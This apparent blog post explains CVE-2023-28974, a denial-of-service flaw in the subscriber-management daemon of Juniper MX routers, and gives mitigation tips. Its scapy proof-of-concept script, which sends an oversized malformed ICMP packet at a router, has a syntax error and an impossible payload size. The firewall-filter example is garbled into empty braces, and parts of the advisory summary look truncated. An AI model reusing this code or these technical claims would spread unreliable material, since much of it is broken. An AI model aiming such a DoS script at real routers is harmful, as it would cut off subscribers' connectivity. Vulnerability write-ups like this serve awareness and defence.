CVE CyberSecurity Database News

CVE-2023-28974 - Juniper MX Series DoS Vulnerability Explained with PoC and Protection Tips

Poster -

Juniper Networks is a well-known name when it comes to high-speed networking hardware. However, even the most established vendors can have security issues. One such vulnerability is CVE-2023-28974—a flaw in Juniper Networks Junos OS running on MX Series routers involving improper input checks in the bbe-smgd (Broadband Edge Subscriber Management) daemon.

This post will help you understand what this vulnerability is, how it works, what makes it dangerous, and how you can protect your network—even if you’re not a full-time security pro. I’ll share log examples, a basic proof-of-concept (PoC), and authoritative resources.

1. What is CVE-2023-28974?

Imagine running a big Internet Service Provider (ISP) network where each customer, or “subscriber,” connects through a Juniper MX router. These routers use a daemon called bbe-smgd to manage all subscriber sessions (think: logging in, logging out, updating info, etc.).

In simple terms:  
An attacker connected to the same layer 2 network as a subscriber—an apartment neighbor or on a shared WiFi—can send a “bad” ICMP packet to the router. If the router’s software isn’t properly checking for unusual network conditions, this malformed packet can crash the bbe-smgd process.

2. Who Is Affected?

According to Juniper’s advisory, any MX Series router running these Junos OS versions:

22.3 before 22.3R1-S2, 22.3R2

Note: Other Junos platforms or MPC (Modular Port Controllers) without bbe-smgd are not affected.

3. How Does the Exploit Work?

At its core, the exploit takes advantage of bad input handling. The bbe-smgd process is supposed to parse every ICMP (internet control message protocol) packet to figure out what to do. But when it receives certain odd/malformed ICMP packets, it doesn’t react gracefully—instead, it crashes.

Example Sequence

1. Attacker connects to the same subnet as the router interface (for example, on a shared broadband connection).
2. Sends custom/invalid ICMP packet to the router’s IP (the one handling subscribers).

bbe-smgd crashes upon receipt of the malformed packet.

4. Subscriber management fails—people connecting, disconnecting, or updating their sessions are impacted.

If you have traceoptions for smg-service enabled, you might see a log like this

BBE_TRACE(TRACE_LEVEL_INFO, "%s: Dropped unsupported ICMP PKT (src: %s, dst: %s), details: %d")

4. Proof of Concept (PoC): Malformed ICMP Packet

You can use Python's scapy tool to craft a malformed ICMP packet. (Be careful! Only test in lab environments, not production.)

from scapy.all import *

# Replace with the actual Juniper MX IP address
dst_ip = "ROUTER_IP_HERE"

# Layer 2 MAC address of router (if known), or leave for local IP handling
dst_mac = "ROUTER_MAC_HERE"

# Craft a malformed ICMP echo request with invalid data
pkt = Ether(dst=dst_mac)/IP(dst=dst_ip)/ICMP(type=8, code=)/("X" * 70000)  # Overly large payload

# Send the packet (requires root)
sendp(pkt, iface="YOUR_INTERFACE_NAME", count=1)

- You can also experiment with invalid ICMP codes or truncated/oversized payloads.

What’s happening?

The overlarge or invalid packet is not handled as expected. The result is a crash of the subscriber-management daemon, causing session drops and DoS.

Important: This is just a basic example. Modifying ICMP headers or payload sizes, or using fuzzing tools, can create similarly crafted packets.

set system processes smg-service traceoptions flag all

- _Monitor for crashes or dropped sessions_ in bbe-smgd logs.

### Mitigation

- Upgrade your Junos OS to a safe version listed in the advisory.
- _Isolate subscriber management interfaces_—never let unauthenticated devices have direct L2 access to the router management plane.
- Use firewall filters to drop unexpected ICMP packets from subscriber side, at the interface ingress. Example:

shell

}

}

interfaces {

xe-// {

}

}
 <br><br>- (Modify xe-//` to your actual subscriber-facing interface.)

---

## 6. Official Reference and Additional Reading

- Juniper Official Advisory (JSA70120)
- NVD entry for CVE-2023-28974
- Juniper Junos Security Advisories

---

## 7. Conclusion

CVE-2023-28974 is a serious issue for ISPs, campus networks, and anyone providing layer 2 broadband access with Juniper MX Series routers. The flaw is easy to exploit, can be done without authentication, and directly impacts customer connectivity.

How to stay safe:
- Patch immediately to secure Junos versions.
- Use network segmentation and firewall rules to protect management interfaces.
- Monitor for unusual session drops or daemon crashes.

Stay vigilant, keep your software up to date, and share awareness with your networking team. You can stop this vulnerability from being a problem in your network!

---

*If you found this helpful, feel free to share or check back for more deep dives into network vulnerabilities!*

Timeline

Published on: 04/17/2023 22:15:00 UTC
Last modified on: 04/18/2023 03:15:00 UTC